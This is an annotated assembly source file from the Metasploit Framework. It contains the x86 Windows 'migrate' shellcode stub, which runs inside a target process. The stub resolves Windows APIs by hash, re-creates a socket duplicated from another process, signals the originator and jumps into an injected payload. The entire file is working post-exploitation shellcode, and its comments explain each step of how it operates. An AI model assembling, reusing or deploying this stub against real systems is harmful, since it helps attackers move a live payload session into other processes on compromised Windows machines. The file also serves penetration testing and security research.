GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/x86/src/migrate/migrate.asm
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Architecture: x86
; Version: 1.0 (Jan 2010)
; Size: 219 bytes
; Build: >build.py migrate
;-----------------------------------------------------------------------------;
; typedef struct MigrateContext
; {
; union
; {
; HANDLE hEvent;
; BYTE bPadding1[8];
; } e;
; union
; {
; LPVOID lpPayload;
; BYTE bPadding2[8];
; } p;
; WSAPROTOCOL_INFO info;
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;  // offsets: e at 0, p at 8, info at 16 (the 8-byte unions fix these; the stub reads [esi], [esi+8], [esi+16] accordingly)
; Register roles in this stub (the code below relies on all of them):
;   esi = LPMIGRATECONTEXT, taken from the stub's first stack argument
;   ebp = address of api_call (from block_api.asm); every API call is `call ebp`
;   ebx = &ctx->info, the WSAPROTOCOL_INFO used to re-create the socket
;   edi = the re-created socket, left in place for the payload
;   eax = scratch / API return value
; api_call convention as used here: push the arguments right-to-left, push the
; module/function hash, `call ebp`; the result comes back in eax.  esi, edi and
; ebp are assumed to survive each call (they are read after them).
; No return value is checked anywhere in this stub (presumably a size trade-off),
; so a failing LoadLibraryA / WSAStartup / WSASocketA is not detected here.
[BITS 32]
[ORG 0]                  ; Position independent: the only absolute address used is recovered by call/pop below.

cld                      ; DF=0 so forward string ops (presumably used inside api_call) walk upward.
mov esi, [esp+4]         ; esi = first stack argument: pointer to the MigrateContext described above.
sub esp, 0x2000          ; Move esp 8 KiB down so the pushes/buffers below stay clear of the caller's frame.
                         ; NOTE(review): no stack probe; assumes that range is already committed or is
                         ; reached via guard-page growth -- confirm for the thread the injector uses.
call start               ; Pushes the address of 'delta' (= first byte of the included api_call) and jumps to start.
delta:                   ; api_call lives here: block_api.asm is expected to put it at its first byte.
%include "./src/block/block_api.asm" ;
start:                   ;
pop ebp                  ; ebp = &api_call, the dispatcher used for every API call below.

push 0x00003233          ; Little-endian bytes "32\0\0" ...
push 0x5F327377          ; ... preceded by "ws2_", leaving the NUL-terminated string "ws2_32" on the stack.
push esp                 ; lpLibFileName = &"ws2_32"
push 0x0726774C          ; hash( "kernel32.dll", "LoadLibraryA" )  (hashing scheme is defined in block_api.asm)
call ebp                 ; LoadLibraryA( "ws2_32" ) -- maps ws2_32.dll so the ws2_32 hashes below can resolve; the HMODULE in eax is discarded.

mov eax, 0x0190          ; eax = sizeof( struct WSAData ) = 400 bytes.
sub esp, eax             ; Reserve the WSAData structure on the stack (never released; there is no ret in this stub).
push esp                 ; lpWSAData = &WSAData
push eax                 ; wVersionRequested = 0x0190 too -- the same constant is reused to save bytes; it is not a real
                         ; Winsock version, and the version Winsock reports back in WSAData is never examined.
push 0x006B8029          ; hash( "ws2_32.dll", "WSAStartup" )
call ebp                 ; WSAStartup( 0x0190, &WSAData );

push eax                 ; dwFlags = eax, which is 0 only if WSAStartup succeeded; on failure its error code lands
                         ; here and also skews the 0/1/2 arithmetic on eax that follows (nothing checks this).
push eax                 ; g (socket group) = 0
lea ebx, [esi+16]        ; ebx = &ctx->info: the WSAPROTOCOL_INFO presumably filled in by the originating process
                         ; (WSADuplicateSocket) -- confirm against the injector.
push ebx                 ; lpProtocolInfo = &ctx->info, so the duplicated socket is reconstructed in this process.
push eax                 ; protocol = 0 (no explicit protocol)
inc eax                  ; eax = 1
push eax                 ; type = SOCK_STREAM (1)
inc eax                  ; eax = 2
push eax                 ; af = AF_INET (2)
                         ; NOTE(review): af/type are hard-wired to IPv4 stream; whether a duplicated socket of
                         ; another family is reconstructed correctly through this path is not verified here.
push 0xE0DF0FEA          ; hash( "ws2_32.dll", "WSASocketA" )
call ebp                 ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
xchg edi, eax            ; edi = new socket handle for the payload (eax's old value is not needed afterwards);
                         ; an INVALID_SOCKET result is passed on unchecked.

push dword [esi]         ; hEvent = ctx->e.hEvent
push 0x35269F1D          ; hash( "kernel32.dll", "SetEvent" )
call ebp                 ; SetEvent( hEvent ); -- presumably signals the waiting originator that the socket has been
                         ; re-created here; note it fires before the payload below has run.

call dword [esi+8]       ; Enter ctx->p.lpPayload with edi = socket. Not expected to return: nothing follows this
                         ; instruction, so a payload that did return would run off the end of the stub.